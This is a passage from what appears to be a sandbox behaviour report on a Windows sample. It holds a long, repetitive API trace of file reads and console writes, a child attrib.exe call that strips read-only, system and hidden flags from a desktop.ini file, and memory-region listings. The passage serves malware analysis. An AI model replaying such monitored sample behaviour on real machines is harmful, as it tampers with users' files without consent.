lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.569] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.569] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.570] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.570] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.571] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.571] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.572] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.572] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.573] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.573] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.574] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.574] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x32, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.575] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x32, lpOverlapped=0x0) returned 1 [0205.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.575] _close (_FileHandle=4) returned 0 [0205.575] FindNextFileW (in: hFindFile=0x240e80, lpFindFileData=0x12ef6c | out: lpFindFileData=0x12ef6c) returned 0 [0205.576] GetLastError () returned 0x12 [0205.576] FindClose (in: hFindFile=0x240e80 | out: hFindFile=0x240e80) returned 1 [0205.576] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0205.576] _close (_FileHandle=3) returned 0 [0205.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.577] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.577] SetConsoleInputExeNameW () returned 0x1 [0205.577] GetConsoleOutputCP () returned 0x1b5 [0205.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.577] exit (_Code=0) Process: id = "496" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0xefc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "494" os_parent_pid = "0x4d4" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30414 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30415 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30416 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30417 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30418 start_va = 0x9b0000 end_va = 0x9b6fff entry_point = 0x9b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30419 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30420 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30421 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30422 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 30423 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30424 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30425 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30426 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 30427 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30428 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 30429 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30430 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30431 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: 